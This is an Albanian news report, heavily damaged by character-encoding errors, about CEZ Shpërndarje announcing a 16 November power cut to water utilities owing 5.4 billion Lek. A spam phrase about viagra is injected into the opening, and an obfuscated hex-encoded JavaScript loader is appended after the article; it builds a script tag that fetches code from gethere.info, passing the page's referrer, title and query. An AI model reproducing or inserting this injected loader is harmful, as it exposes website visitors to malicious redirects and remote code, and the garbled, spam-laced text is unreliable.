largea_cez1352966896

CEZ: Me 16 NA�ntor ndA�rpresim energjinA� ujA�sjellA�save debitorA�

efectos del viagra. CEZ ShpA�rndarje njofton se ditA�n e premte, 16 nA�ntor, do tA� ndA�rpresA� furnizimin me energji tA� tA� gjitha kompanive tA� ujA�sjellA�sit qA� janA� debitore ndaj kompanisA�.

a�?Shuma qA� i detyrohen CEZ ShpA�rndarjes kompanitA� e ujA�sjellA�sit tashmA� ka arritur lartA�sinA� e 5.4 miliardA� Lek (38 milion Euro). KA�to kompani janA� njoftuar herA� pas here pA�r borxhet e tyre ndaj CEZ ShpA�rndarje dhe afatet pA�r pagesA�n e borxhit janA� shtyrA� disa herA�a�?,- thuhet nA� njoftimin e CEZ ShpA�rndarje.

CEZ ShpA�rndarje sqaron se ka kryer takime tA� shumta me pA�rfaqA�sues tA� kompanive tA� ujA�sjellA�sit duke ofruar mundA�si tA� ndryshme zgjidhjeje si skema lehtA�suese pA�r shlyerjen e debisA� me kA�ste dhe mundA�sinA� e pagesA�s sA� pjesshme tA� debisA�. CEZ gjithashti thekson se ka ofruar dhe anullimin e borxheve tA� kompanive tA� ujA�sjellA�sit pA�rkundrejt borxhit qA� CEZ ShpA�rndarje i detyrohet KESH-it, gjA� qA� fatkeqA�sisht A�shtA� refuzuar gjithashtu.

“Ne dA�shirojmA� tA� kA�shillojmA� publikun qA� tA� pA�rgatitet pA�r ditA�t qA� pasojnA� 16 nA�ntorin, duke u siguruar qA� tA� mbushin tA� gjitha rezervat e mundshme qA� kanA� nA� dispozicion dhe tA� interesohen pranA� kompanive tA� tyre tA� ujA�sjellA�sit, nA�se ata ofrojnA� alternativa pA�r furnizmin me ujA� tA� konsumatorA�ve tA� tyre”, thuhet ndA�r tA� tjera nA� njoftimin e CEZ.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}